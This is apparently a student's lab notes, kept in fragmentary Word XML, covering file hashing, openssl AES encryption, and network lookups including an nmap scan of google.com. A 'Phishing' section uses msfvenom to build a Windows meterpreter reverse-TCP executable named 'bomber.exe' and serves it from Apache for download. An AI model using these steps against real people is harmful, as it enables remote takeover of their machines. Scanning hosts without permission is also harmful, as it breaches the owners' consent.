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Important commands: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ifconfig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nano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  <w:br/>
        <w:t xml:space="preserve">SHA 512/256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t xml:space="preserve"> - nano sample.txt</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//create file</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"> - cat sample.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"> - sha256sum sample.txt</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//sha 256</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"> - sha512sum sample.txt</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">//sha 512</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve"> - sha1sum sample.txt                 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//sha 128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Phishing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sudo su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cd /var/www/html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mkdir daivik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cd daivik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msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=4443 -f exe -o /var/www/html/daivik/bomber.exe</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">- sudo service apache2 start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 also go to mozilla and pout xxxIP/daivik and download bomber.exe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t xml:space="preserve"> -  then go to virus total and upload bomber.exe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AES encrypt/decrypt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types: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aes-256-ecb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aes-256-cbc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aes-128-cbc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==&gt;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openssl version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nano msg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 msg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openssl enc -aes-256-cbc -base64 -in msg -out enc1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 enc1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openssl enc -aes-256-cbc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-base64 -in enc1 -out dec1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 dec1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Answer the below Questions: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Find out the IP address of the google.com.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Identify how many hops passed to reach the server google.com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Find out how many ports are open in the google.com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nslookup google.com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traceroute -n google.com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sudo nmap google.com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